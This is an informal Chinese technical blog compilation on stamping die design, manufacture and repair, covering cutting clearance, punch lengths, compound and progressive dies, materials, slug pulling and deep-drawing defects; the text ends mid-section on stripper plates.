考虑到冲压模具制造中的偏差及使用中的磨损、生产中通常只选择一个适当的范围作为合理间隙,只要间隙在这个范围内,就可冲出良好的制件。冲压模具在生产过程中,会不断磨损而使间隙增大,设计与制造新冲压模具时要采用最小合理间隙值。
冲压模具冲裁间隙,根据工厂老师傅多年来对模具的研究和改进的经验,尺寸精度、断面垂直度要求高的制件应选用较小间隙值,断面垂直度与尺寸精度要求不高的冲压件,应以降低冲裁力、提高冲压模具寿命为主,可采用较大间隙值。其值可按下列经验公式来计算:
软材料:
材料厚度t< 1 mm, 冲裁间隙c=(3% ~ 4%)t
t = 1 ~ 3mm, c = (5% ~8%)t
t = 3 ~ 5mm ,c =(8% ~10%)t
硬材料 :
t <1mm,c = ( 4% ~5% )t
t = 1 ~ 3mm, c = ( 6% ~8% )t
t = 3 ~ 8mm, c = ( 8% ~ 13%)t
以下是书本上的理论知识,主要依据是保证上下裂纹会合,以便获得良好的断面。
根据三角形 ABC的关系可求得间隙值c为:
c =( t – h0 ) tanβ = t (1-h0/t) tanβ
式中, h0—— 图 模切入深度;β——最大剪应力方向与垂线方向的夹角。
从上式看出,间隙 c与材料厚度t、相对切入深度h 0/t以及裂纹方向β有关。而h0与β又与材料性质有关,材料愈硬, h 0/t愈小。
因此影响间隙值的主要因素是材料性质和材料厚度。材料比较硬或比较厚,间隙值越大。
★冲压模具开发全过程
冲压模具是怎么一步步加工出来的?
一套完整的冲压模具开发全过程,首先应该是客户把产品图发给冲压模具设计部门主管,由设计主管确认以本部门的技术是否可以把该产品做出来。如果可以,那么就交给设计人员出图备料。把模具需要的各个板子先买回来,粗加工让位、模板厚度研磨到一定的尺寸,一般是两面共留50条(0.50mm)的余量,粗加工好了以后,送去热处理。
同时,设计部门人员开研讨会制定该产品一步一步的工序图样,排出料带图。一个产品不可能只通过一个工序就能生产出来,还必须与其它工序配合,才能生产出合格的产品。产品工序图确定完毕了以后,设计人员开始设计模具。
等设计把整个模具的所有零件画好出图了以后,模具就可以正式开始加工了,首先是模板研磨到正确的尺寸,然后放电、放穿线孔,再线切割、割入块孔、刀口、落料等,再送到铣床或CNC加工沉头、让位等,最后由品保检测,不合格则退回责任部门再加工,合格了以后就可以送到仓库入库。
最后由钳工从仓库领走,开始组立前的准备工作,如倒角、去处毛刺、铁锈、确认尺寸、检查各个地方是否加工到位、是否缺孔少孔、螺丝牙是否有漏掉等,模具零件到了就可以暂时先开始组立模具了,到一点装一点,等模具零件到齐了以后,模具差不多就装好了,比零件全部都到齐了才开始装U节省了许多时间。
模具组立完毕,开始试模、调试模具,直到模具可以生产出尺寸精度、外观质量复合要求的产品,然后送给客户签样品,客户确认好了,这一套模具的所有工作才算正式完成,就等上机台生产。以后就是修模、保养模具了。模具没事,钳工作业人员就没事。做钳工这一行比较操心,还不知道模具什么时候坏,只要坏了马上就要去修,修的次数多了,就比较烦人。当然,如果你模具装的好,该做的地方都做到位了,模具也没那么出问题。
★什么是冲头?冲头长度怎么计算?
冲头长度怎么计算?
首先,我们来研究一下什么是冲头?冲头在冲压模具里面起什么作用?
冲头是指安装在夹板上的凸模,一般起冲孔、切料、折弯、打段差、打凸包、打沙拉、抽芽、铆螺柱等作用,这些都可以简称为“冲头”。
冲孔的“冲头”长度等于:夹板的厚度+止挡板的厚度+脱料板的厚度+料厚+(1~2)两毫米;
90度折弯冲头的长度等于:夹板的厚度+止挡板的厚度+脱料板的厚度+料厚再加一两个毫米就可以了,试模时根据需要再适当调整;其它角度的折弯冲头前面一般是有一定角度,计算时要灵活应用、根据角度来合理计算。
打段差的冲头长度等于:夹板的厚度+止挡板的厚度+脱料板的厚度+段差高度。
这些只是死方法,实际应用时还要根据情况而定,这里就不一一讲解,等你对冲压模具了解的比较多一点以后自然就知道了。
★复合模具,什么是复合模具?
复合模是指在冲床的一次行程中,完成多个冲压工序的模具。可使用复合模结构的工序有:平面下料、落料、切断、折弯、成型、整型、拉伸、镦边、挤压、翻边等,可以按照实际情况需要灵活选用。一般可以选用4个工序以下,太多会使模具制造困难、模具强度下降、容易损坏,造成修模频率增加,模具成本上升。使用复合模生产,可以提高产品的精度,提高生产效率。
举个例子:比如冲制一个垫圈,可以用两副模具分别冲孔、落料完成,冲孔是冲中间的孔,落料是将外形冲制出来;如果用一副模具一次完成,就是复合模具。单步模具中还有拉伸、切边等,只要一副模具一次完成两个或两个以上工步的就叫复合模。
复合模由于其工序组合的不同,脱料装置也不尽相同,有空了我分享一些常见复合模结构给大家吧。
下料或向上折弯复合模的结构:其凸模(也称为公模或冲头)设计在下模,其它几块模板依次是下夹板(固定凸模冲头)、下止挡板和下脱料板(外脱),上模依次是母模(或刀口)、内脱板和上垫板构成,内脱使用等高套筒挂在上垫板上面,然后用打杆或弹簧顶着。
用来下料的复合模,其内脱一般脱出来母模0.50mm即可,不可以低于母模,要不然母模刀口容易崩掉或者不脱料。内脱的力量要足够大,才能把产品从母模里面顶出来,一般如果材料比较厚的话,我们上面装的是氮气弹簧。
复合模属于一种模具结构,可以把它归类为工程模,因为在工程模上用的比较多,一般一整个工程模都是采用复合模结构。
连续模的向上成型、向上折弯、向上打凸包、向上打凸点、向上打翘角,一般也采用的是复合模结构。
★复合模具冲凸包时冲头要高出脱板吗?
今天收到一位同学的提问,说:复合模具冲凸包时冲头要高出脱板吗?
答案是肯定的,不高出脱料板那怎么冲凸包?
建议这位同学再好好复习下什么是复合模?冲头长度怎么计算?把这些搞清楚了自然就明白这个问题该怎么解答了。
复合模具结构冲凸包时,冲头长度等于:夹板厚度+止挡板厚度+脱料板厚度+凸包高度。
也就是在冲的时候,模具在冲床上打死的时候,冲头是必须要高出脱料板来的,高出多少?当然是凸包要求多高,这里就要多高,必须在允许的凸包高度要求精度范围内。
在模具开模、模具打开的时候,模具不承受任何力量的情况下,凸包冲头必须比脱料板矮、缩回脱料板里面才可以,否则就要增加脱料行程。
复合模具冲凸包时,模具打下来时,脱料板必须要先压料,而且压料力要足够,然后再冲凸包,不然产品可能会变形、凸包尺寸不稳定等。
★冲压模具模板的材料和功能
一般的冲压模具都是由:
上下托板、上下垫脚、上下模座:一般用A3、Q235等“软料”做成,起支撑整个模具、方便架模、落料等作用。
上、下模板:上、下模板起固定刀口、入块、入子、顶料销等作用,外定位、内定位、浮升引导销、两用销、导料板、浮块这些也是固定在下模板上的,下模板硬度要求必须在HRC58~62左右,硬度太低会影响冲裁质量。厚度一般为25~40mm。有的刀口直接割在模板上的,即在模板上直接挖刀口,这样做的话如果刀口缺了、打崩了、磨损了、有毛边就不好修模;还有一种做法是挖入块,即把刀口挖在一个入块上(该入块习惯称为“下模刀口”),然后再把下模刀口装入下模板里面。高度要保证和下模板一样高,误差要在正负1~2条之内,最好正负0.005mm以内,一般磨床师傅或钳工师傅都可以达到。太多会把产品打出印子(模印)。
上、下垫板,垫板一般用Cr12制成。根据需要,每套模具的上下垫板厚度都不一样,看冲裁力,如果冲的孔少的话,上下垫板可以适当做薄一点8~10mm即可,如果冲孔比较多的话,就要适当做厚一点,一般17~20mm左右。下垫板上主要是落料孔、弹簧过孔、螺丝过孔、导柱透气孔等。
上、下夹板,上下夹板主要起固定凸模、冲头、导柱之用,一般17~20mm即可。冲压模具夹板的材料硬度一般不需要特别高,一般用软料即可,但是太软了也不行,有可能会把冲头的挂台直接拉到夹板里面去,把夹板拉坏。所以设计冲压模具,要从所要总裁的工件的冲裁工艺来考虑其模具的结构、模具材料的选材,所选冲床的吨位,冲裁间隙的大小等等,才能使加工完的工件毛刺更小,延长模具的使用寿命。
止挡板、脱料板等,止挡板用Cr12即可,但脱料板必须使用硬料如Cr12Mov。止挡板和脱料板是通过M6或M8螺丝打合销然后锁在一起的,止挡板上面主要是一些过孔,冲头过孔、导柱过孔等。脱料板主要起脱料、压料、导正冲头等作用。一般我们使用脱料板来导正凸模、导柱、冲头。生产铝料的话因为铝屑容易跳进脱料板里面,把冲头拉毛、或卡住冲头、把冲头拉断、拉出脱料板等,所以必须使用止挡板来导正冲头,而脱料板单边适当放大10~20条;或脱料板做两节的,上面一节用来导正、下面一节同样是单边放大10~20条。止挡板一般厚度8~17毫米,也是根据冲孔的多少、所要受到的力的大小来看的;脱料板一般厚度20~25mm。
凹模、凸模,也称冲头 或 刀口,是用来把多余的材料冲掉、切掉,或切开、刺破、拉伸。如:拉伸冲头、折弯冲头、滑块的插刀、打沙拉冲头、打凸包冲头、抽芽冲、铆合模的铆合冲头等等。。凹模凸模的材料需要的硬度较高,常用的凹模凸模材料有:Cr12Mo1v1、Cr12Mov、Skd-51、Skd-11、W6Mo5Cr4V2(钨钢)等。。
专业术语解释:
挖:做模具人习惯称呼,是指线切割框口的意思。比如:挖刀口、挖入块等。
软料:在冲压模具中,是指硬度在HRC35左右、硬度比较低的模具钢,如45#钢、A3、Q235等。你用个硬度稍微高一点的东西在上面敲一下,就能敲出个坑出来,这种材料很软、所以习惯称为“软料”,因为它的抗震性能比较好,一般用来制作冲压模具的上下托板、上下垫脚、上下模座。
硬料:在冲压模具中,是指硬度(热处理后)在HRC58~62左右或以上的模具钢料,如:Cr12、Cr12Mo1v1、Cr12Mov、Skd-51、Skd-11、W6Mo5Cr4V2(钨钢),这些钢料硬度很高(但是也比较脆,稍微不注意有可能就被你搞崩掉一块,55),一般用来做冲压模具的刀口、冲头或其它要求硬度较高的零件。
★冲压模具三视图
冲压模具三视图,你懂吗?不管是做冲压模具钳工,还是做冲压模具设计,或者是数控操作、数控编程、以及磨床、铣床等等,只要是和机械加工有关的,都必须有看图、读懂图的本领,这是必不可少的,如果你连图都看不懂,还怎么加工零件?
视图:从各个不同的方向去观察一个物体得到的几何图案。
例如:当一个物体摆在你的面前:
1、从正面来看,得到的几何图形就称之为主视图;从后面看,得到的几何图形就称之为后视图;
2、从正左边来看,得到的几何图形就称之为左视图;从正右边来看,得到的几何图形就称之为右视图;
3、从上往下看,得到的几何图形就称之为俯视图,从下往上看,得到的几何图形就称之为仰视图;
4、为了使图形表达的更准确,更能让人读懂,通俗易懂,有时候还需要画上剖视图、全剖视图、半剖视图、断面图等。剖视图,就是把它剖开,你看到的图形;全剖视图:就是全部剖开得到的图形;半剖视图,就是把它剖了一半(不是全部剖开),得到的几何图形;断面图,就是想象一下这个物体从这里断裂,然后把断裂以后你看到的视图用图形表达出来,这就是断面图。
嘿嘿,我这样讲不知有没有把你弄糊涂呢?下面有一幅图,看一下相信你就能明白了:
你能把这几个视图所表达的几何体用三维的画法把它画出来吗?
下面讲一下三视图。
三视图的基本规律:长对正、宽平齐、高相等。
长对正——主视图和俯视图的长度对正。
宽相等——俯视图和左视图、右视图的宽度相等。
高平齐——主视图、左视图、右视图的高平齐(相等)。
下面这些资料是我在别的地方找的,希望能对你的学习有所帮助。
其实这些概念不需要懂得很透彻,大概懂就行,这些毕竟是理论知识,理论知识是死的,懂得再多也没用。最重要的还是实践、实际能力,能看懂图、读懂图,能把一个几何物体用视图的方式表达出来,别人看了你的图之后能够清楚你要表达的是什么,这样就很不错了。模具设计做的就是这样的工作,把自己心里所想的用图纸表达出来,别人根据你画的图把零件加工出来,钳工师傅拿到这些零件以后,能够把模具组装起来、打出合格的样品出来就OK,
★冲压模具常用材料
冲压模具(也称五金模具)常用的冲压材料有:
铝材:铝料,一般外观件用铝材的比较多,比如笔记本或上网本的键盘,其他的一些配件等;
镀锌板:就是在冷轧板表面镀上了锌层,俗称镀锌板。镀锌板有SECC、SGCC等,镀锌板防锈耐腐蚀。价钱比较高。通用板厚在0.4~3.2mm。其特点涂装性优越、耐指纹好、耐腐蚀性能好而且保持了冷轧板的加工性。一般机箱、下盖常用的厚度是0.80mm的SGCC材料。硬度中等,比铝材硬度稍高、比不锈钢稍软。SGCC材料比较硬,拉伸性能不是很好,如果用这个材料来拉伸的话,凹模和凸模必须要抛的很光很亮才行,要不然很容易就裂开、暗裂等。
不锈钢:可以用来生产各种大小弹片、外观件,比如:台式电脑机箱后面插各种接口的弹片就是用不锈钢材料 然后通过冲压模具生产出来的。不锈钢的材料比较硬,有时候模具保养找不到垫片可以先用不锈钢材料来应急,冲不锈钢的这种模具冲头、刀口需要经常保养才能保证模具生产顺利。否则,就经常需要修模。哈哈。
一般垫片都需要需要用点焊机把垫片点在零件上面,要不然下次拆模的时候掉了就比较麻烦。有的厂不允许使用垫片,这时候可以使用烧焊把它烧起来,烧好了之后再用磨床把所需要的尺寸研磨出来。
常用的不锈钢材料有SUS301、SUS304等。SUS200系列(包括201、202等)
SUS300系列(包括301、304、310S、321、316L等)和
SUS400系列(包括409、410、420J1、420J2、430、436L、444等)
马口铁:马口铁?是不是有点晕?我当时听厂里的师傅说这是马口铁,我也错以为是“麻口铁”了呢。错了。其实我也分不清楚,反正读音就是麻口铁。索性就认为它是麻口铁吧!麻口铁的延展性能比较好,硬度不高,比较软,一般比较复杂的曲面拉伸适合用麻口铁材料,不容易裂开。比如上盖。一些小弹片等。
马口铁其中Sn是镀层,马口铁又叫镀锡铁马口铁是电镀锡薄钢板的俗称,英文缩写为SPTE,是指两面镀有商业纯锡的冷轧低碳薄钢板或钢带。锡主要起防止腐蚀与生锈的作用。它将钢的强度和成型性与锡的耐蚀性、锡焊性和美观的外表结合于一种材料之中,具有耐腐蚀、无毒、强度高、延展性好的特性。
★节距定位是什么?
什么是节距?节距定位又是指什么意思呢?
节距,顾名思义,节就是指节制,“节距”就是指控制距离。那么节距定位呢,就是通过控制距离来进行定位的意思。控制送料的距离,以免多送、误送,把模具打坏,或者生产出不良品。
在冲压模具中,节距定位一般用在连续模。
知道的人就会说:“废话,工程模哪有用节距定位的?”呵呵。
为什么只有连续模用到节距定位,而工程模却一般不用节距定位呢?
那是因为一般工程模都是打料片的,料片大小、长宽都是差不多的,直接放到工程模里面打就是了,要不然也不会叫“工程模”;当然,工程模也有自动送料的,一般都有送料机设置好的,冲床打一下,送料机就会把材料自动送过来。
连续模一般都是有专门的自动送料机的,要不然怎么打?人工送料 因为有时候送不准确,造成产品报废率太高,而自动送料机就可以避免这个风险。况且也只有一般小厂才用人工送料,稍微大一点的厂,都是安排的有自动送料机的。人工只需要把材料按要求放置到自动送料机上,然后设置好就可以了。
不过,自动送料机也未必那么准确,有时候也会有小小的误差,这时候节距定位就起到非常大的作用了。有人说“节距定位:就是两个定位针之间的距离。”,想想对吗?其实这个说法并不是错误的,理论上讲是这样的。但是,两个定位针之间的距离又是什么呢?它是怎么算出来的呢?哈哈,这个问题太深奥了,你去找个专门做五金模具设计的师傅问一下吧。
下面我给一张图,简单讲下什么叫做节距定位。
其中蓝色的区域就叫做料带吧,然后过来有两个红色的圈,就是靠刀冲头所在的位置,关于靠刀冲头我在这里先不讲,下次有机会写博客了再跟大家讲吧。这次主要讨论的是节距定位,好了,接着说。这边有一个节距定位块,我们姑且就简称为节距定位吧,因为我们做模具中经常就这么说的,如“你把节距定位放哪儿去了?”“去做一个节距定位吧。”这里的节距定位就是指节距定位这个入块。
节距定位通常安装在下模(哈哈,我又废话了,不安装在下模难道安装在上模吗?蠢。),料带一开始进来的地方,料带首先从连续模最开始的地方进来,然后冲两个孔(定位孔),接下来经过靠刀的地方(靠刀是什么?以后再讲。),经过靠刀的地方,在这里切边,把料带切掉一部分,然后通过节距定位把料带挡住,防止误送。
注意到两个画红圈的地方没?那是什么呢?为什么要圈起来呢?想想吧。
其中第一个红圈,那里有一个小缺口,为什么这个地方要留个缺呢?而不切成90°直角?想想吧。
因为后面是什么?后面是节距定位啊。节距定位这里一般是做成直角的。想想,如果前面切边这里也是直角会怎么样?
切边是直角,那么冲头也必然要做成直角,因为直角是个尖角,而一般冲头的料都很脆,虽然硬度很高(硬度越高的东西越脆,不知道我这个说法是否正确,可别误导了你哦!。
很脆,就容易崩掉,生产很多次以后,前面的那个小尖角说不定就没有了,这个时候切出来的还是90度吗?即使是90度,也会有很大的毛边,到了节距定位那里就定不准了,打出来的产品就会误差。。现在知道了吗?为什么那里会有个小缺口?
节距定位那里与材料接触的地方需要保留尖角吗?
当然需要啦!其他没用的地方都可以倒角,防止刮手,把手刮破。但是这个地方千万不能倒。一刀就失去节距定位的作用了,需要把它重新补焊起来,然后研磨出直角。如果你觉得它太尖,可以用锉刀稍稍的刮一下,但是千万别倒太大哦。
因为送料机一般送料的力都是很大的,而且切边一般也只是切掉窄窄的一点,如果这里倒了角,料薄的话,说不定材料会直接越过节距定位冲到模具里面来,此时节距定位就没什么作用啦。
一般像大点的连续模都是使用的两用销+节距定位入块,也就是节距定位那里是专门有一个入块,安装在靠刀、切边那里的,但是在模具比较小、材料比较薄的情况下,就不适用这样的结构了。想想为什么?
一般在模具比较小、材料比较薄的时候,是用的压板来代替两用销的,因为料比较薄,使用压板送料相对好送些,两用销的话就比较麻烦。这种情况 一般可以用 压板+节距定位入块,或干脆就不要节距定位入块了,都有压板了,干嘛还有用节距定位入块呀?设计师不是吃了狗屎了,设计出这样的烂模具!哈哈哈。
如果你设计一个小模具,用的是压板+节距定位入块形式,那么钳工师傅在组模的时候,一定会向上面这句一样骂你了。为什么我如此清楚呢?因为就有过这么一个傻设计设计了这么一套烂模具,然后我们的钳工同事就是这么骂的他、背后笑话他。。嘻嘻。
直接使用压板怎么节距定位呢?是这样的。假如材料宽度是10毫米,切边切掉了两毫米,那么第一对压板之间的距离你可以设计为10毫米(当然要放间隙的,你可别这么傻哦),靠刀这里切边切掉了两毫米,那么第二对压板之间的距离(也就是切边之后)你就可以设计为8毫米,这样不就可以节距定位了吗。
★冲压模具跳废料的原因分析,冲压模具跳料怎么修
什么是跳废料?跳屑又是指什么?可能有些同学不懂,先讲下。
跳废料和跳屑基本是一个意思,就是废料往上跳,跳到下模板上,或者跳到其他地方,总之就是废料从刀口那里跳出来了。
冲头把多余的废料切除,然后可能因为修模人员、设计人员、或产线人员的原因,导致本来已经切除的某些废料又从下模刀口处跳出来了,想想这是多么危险的一件事情。
轻则报废几个产品,严重一点有可能打坏模具,非常严重的可能就要伤到人等等,想想真是太可怕了。做模具就是这样,因为做模具而不小心,失去手或者残疾的也不少。除非你做模具设计,或者其他。只要跟模具打交道,危险就无处不在!
扯远了,下面来分析下冲压模具引起跳废料的原因,以及防御方法。
(一)、引起跳废料(跳屑)的原因
1、冲切废料或落料件外形的影响,外形过于简单、重量太轻,就很容易被冲头带上来;
2、磁力原因,冲头、或者刀口有磁性,本身就有磁性、因为研磨、冲击改变而带来的磁性等,都很容易把废料吸附上来,特别是与铁有关的材料,如马口铁、SECC、SGCC等,打这些材料的模具零件一定要注意退磁,否则模具就老是跳屑,老是需要人过去修模,这是多么烦心的一件事情;
3、冲裁间隙的影响,间隙小或者间隙大都可能会使毛刺随着冲头返回模具表面,加工精度不够,加工误差的影响等。
4、冲裁速度的影响,速度过快有可能会造成冲头与刀口内壁还有废料形成一个活塞,从而造成真空吸附的现象,即冲头把废料从下模刀口里面吸出来。这样你可以让设计在冲头中间挖个小孔,垫板上也要搞相应的槽,让空气流通就不会造成真空吸附了。或者把冲头的刃口搞成不一个平面,不是一个平面吸附的可能性就会小些,具体的如图:
5、切削油的选用与用量不当,油加多了,或者加的油太黏了,废料吸附在冲头上面掉不下去,导致跳屑;
6、凹凸模刃口的锋利程度,太锋利,光亮带多而毛刺少,与刃口凹模避的摩擦力小,容易被冲头吸附;当然这种情况你只能想别的办法来修模具了,不可能把从刀口冲头上下手吧。
7、冲头长度影响,一般我们说冲孔的“冲头”长度等于:夹板的厚度+止挡板的厚度+脱料板的厚度+料厚+(1~2)两毫米,只要符合这个长度就可以了,但是如果太长,料还没压住冲头就开始冲了,容易造成冲头刀口磨损,太短了呢?废料没有被完全冲到刀口下面的那个斜度或者小段差里面去,也容易跳上来。
8、下模刀口的原因,因为下模刀口一般都是有斜度或者段差的,一般斜度是在3~5°,根据实际需要、模具强度综合考虑。研磨的太多,造成冲裁间隙加大,导致跳屑;
9、其他原因,如:异物粘在材料上面被带入模具;
10、如果冲头够大、强度够强的话,也可以在中间挖个孔,冲头屁股后面锁止付螺丝,止付螺丝+弹簧+顶料销,把废料顶下去,顶料销高出冲头表面一两个毫米就好了,太长了可能会把产品顶变形。
11、也可以在冲头前面用502沾一点优力胶上去,或者烧一坨焊,焊个小点上去,当然这要冲头够大、烧焊技术够好才行,否则就把冲头烧坏了,对冲头强度有影响。
★冲压模具拉伸件产品质量分析
冲压模具拉伸件产品质量分析
在产品拉伸过程中,拉伸件主要会出现这几种问题:起皱、开裂、薄厚不均、表面划痕、形状扭曲、回弹等。在这些现象中,以起皱和开裂对产品质量影响最大,产品出现这两种问题是一定交不了货、必须要调整好的,出现这两种问题的产品一般只能报废,客户是不会要的。
一、起皱
材料在拉伸过程中,他的周围边缘部分由于切向应力过大,造成材料失去稳定,使得产品沿边缘切向形成高低不平的皱纹,称为起皱。
起皱严重时,还将引起材料在拉伸过程中难于通过凹模与凸模的间隙,增大拉伸变形力,甚至导致拉裂。
失稳现象的产生,既取决于材料边缘切向应力的大小,也取决于拉伸件的厚度。
一般来说,拉伸模具用氮气弹簧或优力胶比较好些,比较不容易产生起皱、开裂等现象。为什么呢?因为氮气弹簧或优力胶它的力一般比较均衡,不会出现力量大小不均的问题。
氮气弹簧比优力胶要好一些,因为氮气弹簧力量大,也非常均衡,但是价格就要比优力胶贵上好多倍,好多厂都买不起它,一般只有规模稍微大一点的工厂才有钱使用氮气弹簧。
优力胶使用时间长了,就会萎缩掉,力量就没当初那么大了,必须更换新的才可以,但是它的价格比起氮气弹簧来要便宜好多。
防止起皱可以采用压边圈,有的地方称为压料筋,都是一个意思,就是在不影响产品后面工序的情况下,在材料周围放上一圈凸起的筋,俗称压料筋,把材料四周压住,这样做的好处就是,拉伸出来的产品会比较饱满,也可以防止起皱。
压边力在试模的时候是需要做出相对调整的,一般设计出来都不会那么合理,都需要根据打出来的产品然后对压料筋的高度适当做出调整。压边力过大,将导致材料与凹模以及压边圈之间的摩擦力增大,会使材料壁部变薄,甚至拉裂;压边力过小,那么就不能有效地防止起皱。
第二个问题是拉裂,这个是拉伸过程中经常碰到的问题。
当筒壁处所受的拉应力超过了材料的强度极限时,产品会拉裂,裂口一般出现在凸模圆角稍上一点的筒壁处。
影响产品拉裂的因素有:材料的拉伸性能,材料的直径和厚度,拉深系数,凹凸模的圆角半径,压边力,摩擦系数等。
凹凸模的圆角半径太小,太尖,就容易把产品拉裂,一般用的修模方法就是想办法把圆角加大,把圆角处搞光滑一点,抛亮一点,实在不行了在生产的时候加油打也可以,特别是拉伸专用油,非常有效果。
设计冲压模具的时候,可以在客户产品要求允许的情况下,尽量把圆角加大,不要搞得太尖了,有些设计不太懂,设计出来的拉伸模具,试模的时候开裂的很厉害,想累死钳工啊!修模修的烦死人了。
拉伸时,采用必要的润滑,有利于拉伸工艺的顺利进行,筒壁减薄得到改善。但必须注意,润滑剂只能涂在凹模的工作表面,而在凸模和材料接触的面千万不要润滑,因为凸模与毛胚表面间是属于有利摩擦,它可以防止材料滑动、拉裂以及变薄。
★修冲压模具需要会的技术和用到的加工设备?
冲压模具的各个零件必须先经过这些程序:
首先得开料吧,不把材料开出来怎么进行下一步加工呢。开料,也就是指粗加工。一般一块模板必须先经过刨床大概刨平,然后再经过大水磨(磨床,也称为大磨床)粗磨、粗加工,留一定的余量(一般留50条余量,精度要求正负十条就可以了),然后需要热处理的就拿去热处理,热处理完毕了以后,在经过大磨床精加工,这个时候精度就要求高一点了,比如模板厚度是25.00mm,那么精度要求必须在正负0.01mm以内。看模板的作用了,一般差一到两条都没多大关系,只要打出来的产品没有模具印子就好了。
磨床加工完了以后,送去放穿线孔,然后线割,再然后铣床、CNC等。。
如果是小零件,是这样的:根据零件大小,用锯床锯,或用铣床铣,开粗以后磨床磨,多余的切割片切掉,搞得差不多了看情况要么去线切割割,要么去CNC(也称高速铣床)加工,需要放电就放点等。完了之后品保测量。
总的来说,就是刨床、车床、铣床、钻床、磨床,这些是模具钳工人员必须熟练操作的,不过现在稍微大一点的厂基本都用不到刨床、车床,因为都是有专人负责加工的,根本用不着你操心。撇开刨床、车床,还有哪些加工设备必须为钳工人员所掌握呢?
既然制作一套冲压模具需要用到这么多的加工设备,那么修模具呢?模具为什么要修?
因为坏了,打不出产品;为什么会坏?因为设计人员设计的不合理、或者模具生产时间长了,修模人员的技术问题,又或者产线人员的不小心等等。。
修模主要修哪些东西呢?
哪里坏了就修那里,比如不脱料,可能是弹簧力量不够大、脱料零件设计不合理等,此时可能会需要更换弹簧、或增加弹簧,或者改善脱料结构、增加顶料销等,那么就需要用到钻床钻孔、或铣床钻孔沉头,也有可能用到烧焊,那么就需要会操作弧弧焊机器、会烧氩弧焊等,烧完了可能还需要磨、铣等。。
好了,不多说了,总的来说,冲压模具钳工修模人员需要会的技术有:
1、必须熟知各种模具的工作原理,以及他们的加工精度要求;一套冲压模具给你负责,首先你需要要完全弄懂它的结构、还有工作原理,设计思路等,必须熟悉每一个零件的作用、性能,这样模具出问题了、生产时坏了之后才会很快的想到是哪里出了问题,具体要修哪里等。每套模具的结构和设计人员的思路都是不同的,所以每套模具的修模方法都是不同的,总之大同小异啦。经验丰富了,任何一套模具到你手里你都可以信心十足的说“没问题”,就不怕他会出现什么问题,因为任何问题你都可以战胜啦,只是时间和精力问题。不过,即使你经验再丰富,你都不会很有信心。因为模具技术的发展还是很快的,很快就会有新技巧,新的思路,昨天用过的修模方法,到了今天可能就不那么灵啦。。呵呵,说的有点夸张喽,可别打击到你学习模具的信心了哦。
2、熟练操作磨床、铣床、钻床、氩弧焊,加工出来的零件应该符合模具精度要求,刨床、车床基本用不到,这个不会也没多大关系。以前是必须要会的,现在科技都发展的这么快,就用不到了。还有磨钻头、磨铣刀等,这些也是需要大概掌握的,有时候修模要用到,而你又不会的话,那只有干着急,或找别人帮忙。
3、还有放电、线割、CNC,你知道他们是干什么的吗?各自的加工精度又能达到多少?什么时候该用哪个,这个要一清二楚。方便修模的时候可以灵活选用,节省时间,提高修模效率。
总之,就这么多了,模具工作原理懂了之后就什么都不怕了,模具坏了也立马就能想到可能是哪里出了问题、该动哪里等。
设计人员的话,你需要熟练操作绘图软件、实体建模等,如CAD,或UG、Pro/E、3DMAX、Mastercam等,具体看人家厂里要求,可以把模具设计出来就OK!CAD可以用来设计比较简单的模具,一些复杂的模具就需要用到三维方面的,实体造型会比较直观一点,出的错也会少点,毕竟靠CAD来空想的话,即使你空间想象能力再强,还是不那么容易把复杂的模具结构空想的那么透,不能保证不会出现画错、漏画、结构错误的问题,增加模具加工时间,导致模具成交时间增长,浪费时间,消耗人力物力。钳工人员的话,也需要懂一点绘图软件方面的知识,简单的查查直线的长度,零件的宽度尺寸等,这些你应该会。因为修模有时候要用到,不知道零件的尺寸那么如何进行加工、修模呢?
★连续模脱料板压料槽的作用
一般的模具脱料板都是没有设计压料槽的,比如一般的工程模,都是没有压料槽的,但为什么连续模需要设计压料槽呢?为什么工程模不需要压料槽?哈哈,这个问题想通了吗?
为什么工程模不需要压料槽呢?这是因为工程模所冲压的材料一般较厚、较粗糙,精度较低,不需要冲压连续模那么长的料带,而且工程模具也比较小,模板尺寸没有连续模那么长,产品要求的尺寸精度也没有连续模那么高,也比较容易修理和调试,所以工程模一般只需要有限位柱即可,不需要压料槽。而连续模的话,它需要完成批量生产,产品精度也比工程模的产品精度要高,因此对模具的精度要求也相对较高,而压料槽正是提高模具精度的一种方法。所以连续模一般是使用压料槽与限位柱配合使用来控制产品料带在模具中的间隙。
为什么连续模需要设计压料槽呢?因为连续模脱料板在与下模板接触并压住材料的时候,强压的话不代表能完全把材料压住,所以一般连续模的脱料板上、接触下模板的那个面都会有0.05mm到0.08mm深度的压料槽(可以根据料厚适当调整),俗称“预压”,宽度的话刚好比料带要宽那么一点,保证把料全部压在里面,这样才能保证剪裁时料带在模具中间的间隙均匀,使模具在剪裁时可以把材料充分压住,防止因为压料不均造成的冲头、刀口磨损,光亮带不整齐等。
注意:因为是压料槽与限位柱配合使用来控制产品料带在模具中的间隙,脱料板上设计有压料槽,所以在设计限位柱的时候(有些地方称为止高柱,即限制高度的柱子,哈哈。),还应该把这个预压深度也要考虑进去,以减少钳工在组模时的调整时间,加快模具的进度。
比如:产品材料厚度为0.20mm,脱料板压料槽可以设计为0.05mm,则下模板上的限位柱高度可以设计为:下模板厚度+(0.20mm-0.05mm),假如下模板厚度为25.00mm的话,那么下模板上的限位柱高度可以设计为:25.00mm+(0.20mm-0.05mm)-0.03mm强压=25.12mm,这样就可以了,强压的话留0.03mm就差不多了。如果限位柱高度设计为25.15mm的话,这时候强压就没有了,这样是不合理的哦,最好留一点强压,0.03mm即可 ,不要设计的那么死哈。
★连续模垫脚托板什么用
连续模垫脚托板什么用?
垫脚可分为下垫脚、上垫脚;托板可分为下托板、上托板。
连续模的垫脚托板主要作用为:支撑和固定模具,抗压减震、延长模具寿命,增加模具高度、方便架模(即把模具安装到冲床上),下垫脚和下托板还有方便排除废料的作用。
连续模垫脚托板什么用?其实这些东西基本没什么用,能不用就不用吧,因为还有模座呢。
在架模方便的情况下,上托板和上垫脚可以省略,就是说上垫脚、上托板不要也可以,只要架模方便,可以把架模槽设计在模座上面,这样就可以节约一些材料,减少不必要的浪费,为公司节省开支。
但是注意:需要落料的模具,在忽略下托板和下垫脚的时候要注意了哦,因为下垫脚和下托板还有方便排除废料的作用呢,可别忘记了哦,如果出了这样的差错,导致模具无处落料,可真是会被别人笑掉大牙的。
在不影响落料或者不需要落料 、方便架模、模具的其他性能也不会受到影响的前提下,下垫脚和下托板倒是可以省略。因为不需要,当然可以不要。
★冲压模脱板的作用
脱板是脱料板的俗称,上模脱板的代号简称为PSU,脱板上面是止挡板(PPS),然后是夹板(PHU)、垫板等。当然脱板不止有上脱板,还有下脱料板等。
什么叫脱板呢?冲压模脱板的作用是什么呢?
